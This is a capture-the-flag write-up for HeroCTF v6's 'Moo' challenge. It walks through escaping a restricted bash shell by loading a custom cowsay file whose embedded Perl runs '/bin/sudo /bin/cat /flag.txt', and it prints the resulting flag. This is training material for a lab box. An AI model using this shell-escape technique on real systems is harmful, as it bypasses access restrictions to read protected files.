categories writeups articles whoami

Contents

HeroCTFv6 - Moo

ZarKyo included in writeups HeroCTFv6
   412 words   2 minutes 
/heroctfv3/heroctf-banniere.png
Contents

Writeup - Moo

Difficulty : easy

Statement

Just read the flag, it’s all there.

Credentials : user:password

Deploy on deploy.heroctf.fr

  • Format : Hero{flag}
  • Author : Log_s

Solve

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

ssh [email protected] -p 14912                                                                                                                    ✘ 

The authenticity of host '[dyn04.heroctf.fr]:14912 ([172.232.42.224]:14912)' can't be established.
ED25519 key fingerprint is SHA256:8UwtZVfNTvorDdtJPF7cu2Kv3+f80osZROhuWohi46A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[dyn04.heroctf.fr]:14912' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
 ______________________________________________________
/ Welcome dear CTF player! You can read the flag with: \
\ /bin/sudo /bin/cat /flag.txt. Or can you?...         /
 ------------------------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

1
2

user@moo:~$ ls -al /flag.txt 
-r-------- 1 root root 22 Oct 25 18:18 /flag.txt

We are in a restricted shell :

1
2

user@moo:~$ /bin/cat /flag.txt 
bash: /bin/cat: restricted: cannot specify `/' in command names

We do a little reconnaissance :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

user@moo:~$ export -p
declare -x HOME="/home/user"
declare -x LANG="fr_FR.UTF-8"
declare -x LC_ALL="C"
declare -x LOGNAME="user"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=00:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.avif=01;35:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:*~=00;90:*#=00;90:*.bak=00;90:*.old=00;90:*.orig=00;90:*.part=00;90:*.rej=00;90:*.swp=00;90:*.tmp=00;90:*.dpkg-dist=00;90:*.dpkg-old=00;90:*.ucf-dist=00;90:*.ucf-new=00;90:*.ucf-old=00;90:*.rpmnew=00;90:*.rpmorig=00;90:*.rpmsave=00;90:"
declare -x MOTD_SHOWN="pam"
declare -x OLDPWD
declare -rx PATH="/usr/local/rbin"
declare -x PWD="/home/user"
declare -rx SHELL="/usr/local/rbin/rbash"
declare -x SHLVL="2"
declare -x SSH_CLIENT="89.81.9.71 40914 22"
declare -x SSH_CONNECTION="89.81.9.71 40914 10.99.48.2 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="user"

Look for writable variables. Execute export -p to list exported variables. Most of the time SHELL and PATH will be -rx, meaning they are executable but not writable. If they are writable, simply set SHELL to your shell of choice, or PATH to a directory with exploitable commands.

1
2

user@moo:~$ echo $0
/bin/bash

1
2

user@moo:~$ echo /usr/local/rbin/*
/usr/local/rbin/cowsay /usr/local/rbin/dircolors /usr/local/rbin/ls /usr/local/rbin/rbash /usr/local/rbin/vim

We can excuste cowsay and GTFOBins says :

It allows to execute perl code, other functions may apply.

Create a file with vim and place the following text inside :

1

exec "/bin/sudo /bin/cat /flag.txt";

1
2

user@moo:~$ cowsay -f ./file x
Hero{s0m3_s4cr3d_c0w}

Flag : Hero{s0m3_s4cr3d_c0w}

Sources

Updated on Oct 27, 2024
Read Markdown
 HEROCTFMISC
Back | Home